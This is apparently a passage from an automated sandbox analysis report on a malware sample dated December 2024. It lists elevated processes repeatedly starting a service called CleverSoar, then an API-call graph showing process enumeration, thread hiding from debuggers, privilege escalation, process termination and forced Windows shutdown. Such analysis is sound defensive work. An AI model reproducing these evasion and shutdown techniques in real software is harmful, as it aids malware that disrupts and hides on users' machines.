                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:88
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:89
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:90
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:91
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:92
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:93
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:94
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:95
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:96
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:97
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:98
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:99
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:100
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:101
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:102
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:103
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:104
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:105
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:106
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:107
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:108
                      Start time:03:35:14
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:109
                      Start time:03:35:15
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:110
                      Start time:03:35:15
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                        Execution Graph

                        Execution Coverage:1.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:4.9%
                        Total number of Nodes:729
                        Total number of Limit Nodes:9
                        execution_graph 62875 6ca7b8f3 62876 6ca7b905 __dosmaperr 62875->62876 62877 6ca7b91d 62875->62877 62877->62876 62878 6ca7b997 62877->62878 62880 6ca7b968 __dosmaperr 62877->62880 62881 6ca7b9b0 62878->62881 62882 6ca7ba07 __wsopen_s 62878->62882 62883 6ca7b9cb __dosmaperr 62878->62883 62922 6ca6ef40 18 API calls __Getctype 62880->62922 62881->62883 62903 6ca7b9b5 62881->62903 62916 6ca735db HeapFree GetLastError _free 62882->62916 62915 6ca6ef40 18 API calls __Getctype 62883->62915 62886 6ca7bb5e 62889 6ca7bbd4 62886->62889 62892 6ca7bb77 GetConsoleMode 62886->62892 62887 6ca7ba27 62917 6ca735db HeapFree GetLastError _free 62887->62917 62891 6ca7bbd8 ReadFile 62889->62891 62894 6ca7bbf2 62891->62894 62895 6ca7bc4c GetLastError 62891->62895 62892->62889 62896 6ca7bb88 62892->62896 62893 6ca7ba2e 62901 6ca7b9e2 __dosmaperr __wsopen_s 62893->62901 62918 6ca79a89 20 API calls __wsopen_s 62893->62918 62894->62895 62899 6ca7bbc9 62894->62899 62895->62901 62896->62891 62897 6ca7bb8e ReadConsoleW 62896->62897 62898 6ca7bbaa GetLastError 62897->62898 62897->62899 62898->62901 62899->62901 62904 6ca7bc17 62899->62904 62905 6ca7bc2e 62899->62905 62919 6ca735db HeapFree GetLastError _free 62901->62919 62910 6ca80805 62903->62910 62920 6ca7bd1e 23 API calls 3 library calls 62904->62920 62905->62901 62907 6ca7bc45 62905->62907 62921 6ca7bfd6 21 API calls __wsopen_s 62907->62921 62909 6ca7bc4a 62909->62901 62912 6ca80812 62910->62912 62913 6ca8081f 62910->62913 62911 6ca8082b 62911->62886 62912->62886 62913->62911 62923 6ca6ef40 18 API calls __Getctype 62913->62923 62915->62901 62916->62887 62917->62893 62918->62903 62919->62876 62920->62901 62921->62909 62922->62876 62923->62912 62924 6ca6dd5f 62925 6ca6dd6b __wsopen_s 62924->62925 62926 6ca6dd72 GetLastError ExitThread 62925->62926 62927 6ca6dd7f 62925->62927 62936 6ca737d2 GetLastError 62927->62936 62932 6ca6dd9b 62969 6ca6dcca 16 API calls 2 library calls 62932->62969 62935 6ca6ddbd 62937 6ca737ef 
62936->62937 62938 6ca737e9 62936->62938 62942 6ca737f5 SetLastError 62937->62942 62971 6ca75982 6 API calls std::_Lockit::_Lockit 62937->62971 62970 6ca75943 6 API calls std::_Lockit::_Lockit 62938->62970 62941 6ca7380d 62941->62942 62943 6ca73811 62941->62943 62947 6ca6dd84 62942->62947 62948 6ca73889 62942->62948 62972 6ca76005 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 62943->62972 62946 6ca7381d 62949 6ca73825 62946->62949 62950 6ca7383c 62946->62950 62963 6ca78b86 62947->62963 62978 6ca6f8e9 37 API calls std::locale::_Setgloballocale 62948->62978 62973 6ca75982 6 API calls std::_Lockit::_Lockit 62949->62973 62975 6ca75982 6 API calls std::_Lockit::_Lockit 62950->62975 62954 6ca73833 62974 6ca735db HeapFree GetLastError _free 62954->62974 62956 6ca73848 62957 6ca7385d 62956->62957 62958 6ca7384c 62956->62958 62977 6ca735db HeapFree GetLastError _free 62957->62977 62976 6ca75982 6 API calls std::_Lockit::_Lockit 62958->62976 62961 6ca73839 62961->62942 62964 6ca6dd8f 62963->62964 62965 6ca78b98 GetPEB 62963->62965 62964->62932 62968 6ca75b8f 5 API calls std::_Lockit::_Lockit 62964->62968 62965->62964 62966 6ca78bab 62965->62966 62979 6ca75c38 5 API calls std::_Lockit::_Lockit 62966->62979 62968->62932 62969->62935 62970->62937 62971->62941 62972->62946 62973->62954 62974->62961 62975->62956 62976->62954 62977->62961 62979->62964 62980 6c8ff8a3 62982 6c8ff887 62980->62982 62981 6c9002ac GetCurrentProcess TerminateProcess 62983 6c9002ca 62981->62983 62982->62981 62984 6c8e3d62 62987 6c8e3bc0 62984->62987 62985 6c8e3e8a GetCurrentThread NtSetInformationThread 62986 6c8e3eea 62985->62986 62987->62985 62988 6c8e4b53 63146 6ca65863 62988->63146 62990 6c8e4b5c _Yarn 63160 6ca598b0 62990->63160 62992 6c90639e 63252 6ca6ef50 18 API calls __Getctype 62992->63252 62994 6c8e4cff 62995 6c8e5164 CreateFileA CloseHandle 63000 6c8e51ec 62995->63000 62996 6c8e4bae std::ios_base::_Ios_base_dtor 62996->62992 62996->62994 62996->62995 62997 
6c8f245a _Yarn _strlen 62996->62997 62997->62992 62998 6ca598b0 FindFirstFileA 62997->62998 63003 6c8f2a83 std::ios_base::_Ios_base_dtor 62998->63003 63164 6ca63f30 OpenSCManagerA 63000->63164 63002 6c8efc00 63244 6ca64050 CreateToolhelp32Snapshot 63002->63244 63003->62992 63168 6ca4eff0 63003->63168 63006 6ca65863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63010 6c8e5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 63006->63010 63008 6c8f37d0 Sleep 63052 6c8f37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 63008->63052 63009 6ca598b0 FindFirstFileA 63009->63010 63010->62992 63010->63002 63010->63006 63010->63009 63016 6c906ba0 104 API calls 63010->63016 63017 6c906e60 32 API calls 63010->63017 63032 6c8e6722 63010->63032 63034 6c8e6162 63010->63034 63206 6c907090 63010->63206 63219 6c92e010 67 API calls 63010->63219 63011 6c9063b2 63253 6c8e15e0 18 API calls std::ios_base::_Ios_base_dtor 63011->63253 63012 6ca64050 4 API calls 63028 6c8f053a 63012->63028 63013 6ca64050 4 API calls 63037 6c8f12e2 63013->63037 63015 6c9064f8 63016->63010 63017->63010 63019 6c8f0abc 63019->62997 63019->63013 63021 6ca64050 4 API calls 63021->63019 63022 6c8effe3 63022->63012 63022->63019 63023 6c8f211c 63023->62997 63027 6c8f241a 63023->63027 63024 6ca64050 4 API calls 63042 6c8f1dd9 63024->63042 63025 6ca598b0 FindFirstFileA 63025->63052 63029 6ca4eff0 11 API calls 63027->63029 63028->63019 63028->63021 63030 6c8f244d 63029->63030 63250 6ca64b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63030->63250 63220 6ca60900 25 API calls 4 library calls 63032->63220 63033 6c8f2452 Sleep 63033->62997 63035 6c8e740b 63221 6ca63e00 CreateProcessA 63035->63221 63037->63023 63037->63024 63045 6c8f16ac 63037->63045 63038 6ca64050 4 API calls 63038->63023 63041 6c907090 77 API calls 63041->63052 63042->63023 63042->63038 63044 6c8e775a _strlen 63044->62992 63046 6c8e7ba9 63044->63046 
63047 6c8e7b92 63044->63047 63050 6c8e7b43 _Yarn 63044->63050 63049 6ca65863 std::_Facet_Register 4 API calls 63046->63049 63048 6ca65863 std::_Facet_Register 4 API calls 63047->63048 63048->63050 63049->63050 63051 6ca598b0 FindFirstFileA 63050->63051 63060 6c8e7be7 std::ios_base::_Ios_base_dtor 63051->63060 63052->62992 63052->63025 63052->63041 63177 6c906ba0 63052->63177 63196 6c906e60 63052->63196 63251 6c92e010 67 API calls 63052->63251 63053 6ca63e00 4 API calls 63064 6c8e8a07 63053->63064 63054 6c8e9d7f 63057 6ca65863 std::_Facet_Register 4 API calls 63054->63057 63055 6c8e9d68 63056 6ca65863 std::_Facet_Register 4 API calls 63055->63056 63058 6c8e9d18 _Yarn 63056->63058 63057->63058 63059 6ca598b0 FindFirstFileA 63058->63059 63069 6c8e9dbd std::ios_base::_Ios_base_dtor 63059->63069 63060->62992 63060->63053 63061 6c8e962c _strlen 63060->63061 63062 6c8e8387 63060->63062 63061->62992 63061->63054 63061->63055 63061->63058 63063 6ca63e00 4 API calls 63072 6c8e9120 63063->63072 63064->63063 63065 6ca63e00 4 API calls 63082 6c8ea215 _strlen 63065->63082 63066 6ca63e00 4 API calls 63068 6c8e9624 63066->63068 63067 6ca65863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63073 6c8ee8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 63067->63073 63225 6ca64b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63068->63225 63069->62992 63069->63065 63069->63073 63071 6ca598b0 FindFirstFileA 63071->63073 63072->63066 63073->62992 63073->63067 63073->63071 63074 6c8eed02 Sleep 63073->63074 63075 6c8ef7b1 63073->63075 63094 6c8ee8c1 63074->63094 63243 6ca64b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63075->63243 63077 6c8ee8dd GetCurrentProcess TerminateProcess 63077->63073 63078 6c8ea9bb 63081 6ca65863 std::_Facet_Register 4 API calls 63078->63081 63079 6c8ea9a4 63080 6ca65863 std::_Facet_Register 4 API 
calls 63079->63080 63089 6c8ea953 _Yarn _strlen 63080->63089 63081->63089 63082->62992 63082->63078 63082->63079 63082->63089 63083 6ca63e00 4 API calls 63083->63094 63084 6c8efbb8 63085 6c8efbe8 ExitWindowsEx Sleep 63084->63085 63085->63002 63086 6c8ef7c0 63086->63084 63087 6c8eb009 63091 6ca65863 std::_Facet_Register 4 API calls 63087->63091 63088 6c8eaff0 63090 6ca65863 std::_Facet_Register 4 API calls 63088->63090 63089->63011 63089->63087 63089->63088 63092 6c8eafa0 _Yarn 63089->63092 63090->63092 63091->63092 63226 6ca64780 63092->63226 63094->63073 63094->63077 63094->63083 63095 6c8eb42c 63098 6ca65863 std::_Facet_Register 4 API calls 63095->63098 63096 6c8eb443 63099 6ca65863 std::_Facet_Register 4 API calls 63096->63099 63097 6c8eb059 std::ios_base::_Ios_base_dtor _strlen 63097->62992 63097->63095 63097->63096 63100 6c8eb3da _Yarn _strlen 63097->63100 63098->63100 63099->63100 63100->63011 63101 6c8eb79e 63100->63101 63102 6c8eb7b7 63100->63102 63105 6c8eb751 _Yarn 63100->63105 63103 6ca65863 std::_Facet_Register 4 API calls 63101->63103 63104 6ca65863 std::_Facet_Register 4 API calls 63102->63104 63103->63105 63104->63105 63106 6ca64780 104 API calls 63105->63106 63107 6c8eb804 std::ios_base::_Ios_base_dtor _strlen 63106->63107 63107->62992 63108 6c8ebc0f 63107->63108 63109 6c8ebc26 63107->63109 63112 6c8ebbbd _Yarn _strlen 63107->63112 63110 6ca65863 std::_Facet_Register 4 API calls 63108->63110 63111 6ca65863 std::_Facet_Register 4 API calls 63109->63111 63110->63112 63111->63112 63112->63011 63113 6c8ec08e 63112->63113 63114 6c8ec075 63112->63114 63117 6c8ec028 _Yarn 63112->63117 63116 6ca65863 std::_Facet_Register 4 API calls 63113->63116 63115 6ca65863 std::_Facet_Register 4 API calls 63114->63115 63115->63117 63116->63117 63118 6ca64780 104 API calls 63117->63118 63119 6c8ec0db std::ios_base::_Ios_base_dtor _strlen 63118->63119 63119->62992 63120 6c8ec7bc 63119->63120 63121 6c8ec7a5 63119->63121 63130 6c8ec753 _Yarn _strlen 63119->63130 63123 
6ca65863 std::_Facet_Register 4 API calls 63120->63123 63122 6ca65863 std::_Facet_Register 4 API calls 63121->63122 63122->63130 63123->63130 63124 6c8ed3ed 63126 6ca65863 std::_Facet_Register 4 API calls 63124->63126 63125 6c8ed406 63127 6ca65863 std::_Facet_Register 4 API calls 63125->63127 63128 6c8ed39a _Yarn 63126->63128 63127->63128 63129 6ca64780 104 API calls 63128->63129 63131 6c8ed458 std::ios_base::_Ios_base_dtor _strlen 63129->63131 63130->63011 63130->63124 63130->63125 63130->63128 63136 6c8ecb2f 63130->63136 63131->62992 63132 6c8ed8bb 63131->63132 63133 6c8ed8a4 63131->63133 63137 6c8ed852 _Yarn _strlen 63131->63137 63135 6ca65863 std::_Facet_Register 4 API calls 63132->63135 63134 6ca65863 std::_Facet_Register 4 API calls 63133->63134 63134->63137 63135->63137 63137->63011 63138 6c8edccf 63137->63138 63139 6c8edcb6 63137->63139 63142 6c8edc69 _Yarn 63137->63142 63141 6ca65863 std::_Facet_Register 4 API calls 63138->63141 63140 6ca65863 std::_Facet_Register 4 API calls 63139->63140 63140->63142 63141->63142 63143 6ca64780 104 API calls 63142->63143 63145 6c8edd1c std::ios_base::_Ios_base_dtor 63143->63145 63144 6ca63e00 4 API calls 63144->63073 63145->62992 63145->63144 63148 6ca65868 63146->63148 63147 6ca65882 63147->62990 63148->63147 63151 6ca65884 std::_Facet_Register 63148->63151 63254 6ca6de34 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63148->63254 63150 6ca666e3 std::_Facet_Register 63258 6ca68199 RaiseException 63150->63258 63151->63150 63255 6ca68199 RaiseException 63151->63255 63153 6ca66edc IsProcessorFeaturePresent 63159 6ca66f01 63153->63159 63155 6ca666a3 63256 6ca68199 RaiseException 63155->63256 63157 6ca666c3 std::invalid_argument::invalid_argument 63257 6ca68199 RaiseException 63157->63257 63159->62990 63161 6ca598c4 63160->63161 63162 6ca598c6 FindFirstFileA 63160->63162 63161->63162 63163 6ca59900 63162->63163 63163->62996 63165 6ca63f66 63164->63165 63166 6ca63ffb OpenServiceA 63165->63166 63167 6ca64042 
63165->63167 63166->63165 63167->63010 63174 6ca4f003 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 63168->63174 63169 6ca51bac CloseHandle 63169->63174 63170 6ca51a40 CloseHandle 63170->63174 63171 6c8f37cb 63176 6ca64b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63171->63176 63173 6ca510d2 CloseHandle 63173->63174 63174->63169 63174->63170 63174->63171 63174->63173 63175 6ca3c310 ReadFile WriteFile WriteFile WriteFile 63174->63175 63259 6ca3b750 63174->63259 63175->63174 63176->63008 63178 6c906bd5 63177->63178 63270 6c932020 63178->63270 63180 6c906c68 63181 6ca65863 std::_Facet_Register 4 API calls 63180->63181 63182 6c906ca0 63181->63182 63287 6ca66147 63182->63287 63184 6c906cb4 63299 6c931d90 63184->63299 63187 6c906d8e 63187->63052 63189 6c906dc8 63307 6c9326e0 24 API calls 4 library calls 63189->63307 63191 6c906dda 63308 6ca68199 RaiseException 63191->63308 63193 6c906def 63309 6c92e010 67 API calls 63193->63309 63195 6c906e0f 63195->63052 63197 6c906e9f 63196->63197 63200 6c906eb3 63197->63200 63672 6c933560 32 API calls std::_Xinvalid_argument 63197->63672 63202 6c906f5b 63200->63202 63674 6c932250 30 API calls 63200->63674 63675 6c9326e0 24 API calls 4 library calls 63200->63675 63676 6ca68199 RaiseException 63200->63676 63203 6c906f6e 63202->63203 63673 6c9337e0 32 API calls std::_Xinvalid_argument 63202->63673 63203->63052 63207 6c90709e 63206->63207 63213 6c9070d1 63206->63213 63677 6c9301f0 63207->63677 63209 6c907183 63209->63010 63211 6ca6f938 67 API calls 63211->63213 63213->63209 63681 6c932250 30 API calls 63213->63681 63214 6c9071ae 63682 6c932340 24 API calls 63214->63682 63216 6c9071be 63683 6ca68199 RaiseException 63216->63683 63218 6c9071c9 63219->63010 63220->63035 63222 6ca63e90 63221->63222 63223 6ca63ed0 WaitForSingleObject CloseHandle CloseHandle 63222->63223 63224 6ca63ec4 63222->63224 63223->63222 63224->63044 63225->63061 63227 6ca647d7 63226->63227 63729 6ca64e10 
63227->63729 63229 6ca647e8 63230 6c906ba0 104 API calls 63229->63230 63237 6ca6480c 63230->63237 63231 6ca64887 63781 6c92e010 67 API calls 63231->63781 63233 6ca648bf std::ios_base::_Ios_base_dtor 63782 6c92e010 67 API calls 63233->63782 63236 6ca64874 63766 6ca649b0 63236->63766 63237->63231 63237->63236 63748 6ca65160 63237->63748 63756 6c942590 63237->63756 63238 6ca64902 std::ios_base::_Ios_base_dtor 63238->63097 63241 6ca6487c 63242 6c907090 77 API calls 63241->63242 63242->63231 63243->63086 63246 6ca64087 std::locale::_Setgloballocale 63244->63246 63245 6ca64195 Process32NextW 63245->63246 63246->63245 63247 6ca641c7 63246->63247 63248 6ca640e4 CloseHandle 63246->63248 63249 6ca64160 Process32FirstW 63246->63249 63247->63022 63248->63246 63249->63246 63250->63033 63251->63052 63253->63015 63254->63148 63255->63155 63256->63157 63257->63150 63258->63153 63260 6ca3b763 _Yarn __wsopen_s std::locale::_Setgloballocale 63259->63260 63261 6ca3c2b0 63260->63261 63263 6ca3b900 CreateFileA 63260->63263 63264 6ca3a500 63260->63264 63261->63174 63263->63260 63265 6ca3a513 __wsopen_s std::locale::_Setgloballocale 63264->63265 63266 6ca3b0ef WriteFile 63265->63266 63267 6ca3b735 63265->63267 63268 6ca3a7f2 WriteFile 63265->63268 63269 6ca3ab96 ReadFile 63265->63269 63266->63265 63267->63260 63268->63265 63269->63265 63271 6ca65863 std::_Facet_Register 4 API calls 63270->63271 63272 6c93207e 63271->63272 63273 6ca66147 43 API calls 63272->63273 63274 6c932092 63273->63274 63310 6c932f60 42 API calls 4 library calls 63274->63310 63276 6c9320c8 63277 6c93210d 63276->63277 63278 6c932136 63276->63278 63279 6c932120 63277->63279 63311 6ca65dae 9 API calls 2 library calls 63277->63311 63312 6c932250 30 API calls 63278->63312 63279->63180 63282 6c93215b 63313 6c932340 24 API calls 63282->63313 63284 6c932171 63314 6ca68199 RaiseException 63284->63314 63286 6c93217c 63286->63180 63288 6ca66153 __EH_prolog3 63287->63288 63315 6ca65cd5 63288->63315 63293 6ca66171 63329 6ca661da 
39 API calls std::locale::_Setgloballocale 63293->63329 63294 6ca661cc 63294->63184 63296 6ca66179 63330 6ca65fd1 HeapFree GetLastError _Yarn 63296->63330 63298 6ca6618f 63321 6ca65d06 63298->63321 63300 6c906d5d 63299->63300 63301 6c931ddc 63299->63301 63300->63187 63306 6c932250 30 API calls 63300->63306 63335 6ca66267 63301->63335 63305 6c931e82 63306->63189 63307->63191 63308->63193 63309->63195 63310->63276 63311->63279 63312->63282 63313->63284 63314->63286 63316 6ca65ce4 63315->63316 63317 6ca65ceb 63315->63317 63331 6ca6f1ed 6 API calls std::_Lockit::_Lockit 63316->63331 63320 6ca65ce9 63317->63320 63332 6ca673ab EnterCriticalSection 63317->63332 63320->63298 63328 6ca66050 6 API calls 2 library calls 63320->63328 63322 6ca65d10 63321->63322 63323 6ca6f1fb 63321->63323 63327 6ca65d23 63322->63327 63333 6ca673b9 LeaveCriticalSection 63322->63333 63334 6ca6f1d6 LeaveCriticalSection 63323->63334 63326 6ca6f202 63326->63294 63327->63294 63328->63293 63329->63296 63330->63298 63331->63320 63332->63320 63333->63327 63334->63326 63337 6ca66270 63335->63337 63336 6c931dea 63336->63300 63343 6ca6b383 18 API calls __Getctype 63336->63343 63337->63336 63344 6ca6eb6a 63337->63344 63339 6ca662bc 63339->63336 63355 6ca6e878 65 API calls 63339->63355 63341 6ca662d7 63341->63336 63356 6ca6f938 63341->63356 63343->63305 63345 6ca6eb75 __wsopen_s 63344->63345 63346 6ca6eb88 63345->63346 63347 6ca6eba8 63345->63347 63381 6ca6ef40 18 API calls __Getctype 63346->63381 63351 6ca6eb98 63347->63351 63367 6ca79c2c 63347->63367 63351->63339 63355->63341 63357 6ca6f944 __wsopen_s 63356->63357 63358 6ca6f963 63357->63358 63359 6ca6f94e 63357->63359 63365 6ca6f95e 63358->63365 63562 6ca6b3c9 EnterCriticalSection 63358->63562 63577 6ca6ef40 18 API calls __Getctype 63359->63577 63361 6ca6f980 63563 6ca6f9bc 63361->63563 63364 6ca6f98b 63578 6ca6f9b2 LeaveCriticalSection 63364->63578 63365->63336 63368 6ca79c38 __wsopen_s 63367->63368 63383 6ca6f1bf EnterCriticalSection 63368->63383 63370 
